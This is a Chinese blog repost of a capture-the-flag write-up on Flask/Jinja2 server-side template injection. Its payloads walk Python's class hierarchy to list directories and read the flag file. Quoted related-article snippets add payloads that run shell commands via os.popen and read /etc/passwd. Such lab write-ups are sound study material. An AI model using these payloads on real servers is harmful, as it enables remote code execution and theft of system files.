2020.3.31 xctf(Web_python_template_injection)①

最新推荐文章于 2025-11-25 15:14:34 发布

转载最新推荐文章于 2025-11-25 15:14:34 发布 · 387 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：https://blog.youkuaiyun.com/qq_40884727/article/details/101605002

web安全专栏收录该内容

37 篇文章

订阅专栏

本文探讨了Python模块注入的概念，并通过实例展示了如何利用Flask框架中的模板注入漏洞执行任意代码，包括读取文件和列出目录。文章深入分析了payload构造方法，为读者提供了理解和防御此类攻击的思路。

在这里插入图片描述根据题意可知python模块注入

测试payload：http://111.198.29.45:31069/{{3+4}}
在这里插入图片描述执行了{{}}中的代码。

{{''.__class__.__mro__[2].__subclasses__()}}

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

在这里插入图片描述从零学flask模板注入

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

藏蓝色的达达

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[XCTF]攻防世界Web_python_template_injection模板注入

qq_37301470的博客

11-20

3706

模板注入在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload： http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e

python_template_injection

Alita_lxz的博客

11-27

1395

python模板注入 Web_python_template_injection 文章内很多知识内容为转载大佬博客，都在文章开头处声明了文章原文地址事情要从一道CTF的题目说起打开题目，查看源代码，抓包，扫目录，什么也没发现，只有页面上一行字，python template injection，这个之前也没有做过类似的题目，满脸问号，只得去找wp，通过大佬的wp学习了很多题目大概这样做，先通过这条语句判断是否存在注入点 http://220.249.52.133:35728为我的题目地址 htt

参与评论您还未登录，请先登录后发表或查看评论

攻防世界——Web_python_template_injection

2402_88743313的博客

11-25

740

本文介绍了Python模板注入漏洞的利用过程。通过测试发现网站存在Flask框架的模板注入漏洞，利用{{7*7}}和{{config}}确认漏洞存在。进一步通过Python对象继承链获取os模块引用，最终使用第59个子类的os.popen方法执行系统命令，成功读取fl4g文件获取flag：ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}。整个过程展示了从漏洞发现到命令执行的完整利用链。

【攻防世界】Web_python_template_injection

2302_79800344的博客

04-01

1787

【代码】【攻防世界】Web_python_template_injection。

web python template injection_攻防世界WEB高手进阶之python_template_injection

weixin_39705193的博客

12-10

195

python模板注入看了一堆文章，也不是看的很明白，反而把题目做出来了大概思路如下简单探测返回说明服务器执行了{{}}里面这一段代码利用{{ config.items() }}可以查看服务器的配置信息读取passwd信息{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}执行成功Python3代码执行下面这一段...

攻防世界XCTF：Web_python_template_injection

末初 · mochu7

03-13

948

根据题意可知python模块注入测试payload：http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...

XCTF系列 // Web | php_rce & Web_python_template_injection

qq_45805420的博客

07-26

334

前言这两题涉及到的知识点有，ThinkPHP 的远程代码执行漏洞以及 flask的 SSTI 漏洞（服务端模板注入）。　　由于水平有限，关于以上内容的了解均只到表面，具体漏洞原理尚未看明白，详细分析只好以后再补，在这里先参照网上的 writeup，照猫画虎，略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架，它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE（远程命令

攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection

闵行小鱼塘

10-12

1346

继续ctf的旅程，开始攻防世界web高手进阶区的9分题，本文是Web_python_flask_sql_injection的writeup

7.XCTF Web_php_include

山兔的博客

09-16

323

一打开网站，就看到了下面这串代码 <?php show_source(__FILE__); //查看文件 echo $_GET['hello']; //输出hello获取到的数据 $page=$_GET['page']; //变量page由参数page来决定 while (strstr($page, "php://")) { //当变量中有php://时， $page=str_replace("ph

will-zhang_xctf_25356_1764665456755.zip

最新发布

12-03

由于提供的信息不足，无法确定具体的文件内容，因此无法生成与文件相关的详细文章摘要。若需生成相关文章摘要，请提供文件内部的具体内容或者相关的描述信息。

python template injection_XCTF-web_python_template_injection

weixin_29906279的博客

12-30

193

web_python_template_injection这里涉及到flask的ssti漏洞(服务端模板注入)。简单点说就是，在使用flask/jinja2的模板渲染函数render_template_string的同时，使用%s来替换字符串的时候，会把字符串中被{{}}包围内容当作变量解析。例如：@app.route('/')def hello_world():return 'Hello Wor...

XCTF---Web_python_template_injection

weixin_45895555的博客

05-28

549

python template injection （对于出学的我来说）python模板注入不熟。所以花了一天的时间看了不少文章，也慢慢了解了Flask/Jinja2.输入后显示之后输入**{{config.items()}}是可以爆出一些内容的这里有些内容较深就不细究了，当然没法得到有利信息。之后有偿试爆了一下类（看了文章，师傅说<type ‘file’>**类，它是文件系统访问的关键但是还没找到方法，所以继续了一篇） ...

xctf Web_python_template_injection

Furukawado的博客

05-04

1133

先看题，翻译了一下是模版注入，然后使用插件看一下发现是flask框架，注入点应该是这个。百度搜了一下大概有两个一个xss一个文件读取/命令执行有两篇较为详细的文章（虽然我没看太明白，但是确实详细，鄙人只会简单的开发知道flask框架下传值是需要{{}}的。那么先按照xss试一下，不可行但是可以发现有报错回显，开始尝试文件读取/命令执行结果如下开始找类的对象：{{''.__class__}}继续寻找基类：{{''.__class__.__mro__}}

XCTF-Web-高手区-Web_python_template_injection

1stPeak's Blog

06-21

407

题目解题 1、题目提示为python模板注入猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入，就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板，Web应用可以把输入转换成特定的HTML文件或者email格式 2、测试一下 http://111.200.241.244:53038/{{1+1}} 经过该测试，说明存在SSTI 3、那么接下来可以使用相关payload进行验证（1）payload1 查看所有模块 http://111.200.

XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection（SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎）

Onlyone_1314的博客

11-26

1849

目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag（1）site._Printer类调用os.popen函数执行任意命令（2）site._Printer类调用os.listdir函数执行查看本级目录下的文件（3）catch_warnings类的linecache函数执行任意命令（4）遍历基类找函数执行__import __("os").popen("ls").read

【XCTF 攻防世界】WEB 高手进阶区 Web_python_template_injection

weixin_45844670的博客

08-31

342

打开链接只有一行字提示这是python模板注入也就是说可能是jinjia2、djingo、tornado中的一个模板这里涉及到flask的ssti漏洞（服务端模板注入）。简单点说就是，在使用flask/jinja2的模板渲染函数render_template_string的同时，使用%s来替换字符串的时候，会把字符串中被{{}}包围内容当作变量解析。举个例子请求：xxxxxx.xxx/{{ 10*10 }} 响应：xxxxx.xxx/{{100}} Not Found! ...

xctf_python_template_injection

bring_coco的博客

07-18

364

[目标] Python模板注入 [环境] Windows [工具] 浏览器 [分析] 1.根据题目可看出是python的模板注入发现执行此命令，因此是SSTI 2.利用{{}}来查看服务器配置命令{{config.items()}} 3.执行命令，查看目录 os.listdir() 方法用于返回指定的文件夹包含的文件或文件夹的名字的列表。这个列表以字母顺序。它不包括 ‘.’ 和’…’ 即使它在文件夹中。只支持在 Unix, Windows 下使用。使用python的魔法方法命令直接查询目录

Web_python_template_injection（Python模块注入）

Welcome To My6n Blog

04-11

2259

Python的模块注入 flask/jinja2 常用于ssti的魔术方法获取基类的几种方法获取基本类的子类采用os模块的listdir函数来读取目录常用payload

xctf web_php_include

03-29

好的，用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先，我应该回忆PHP中的文件包含漏洞，尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示，$lan变量直接...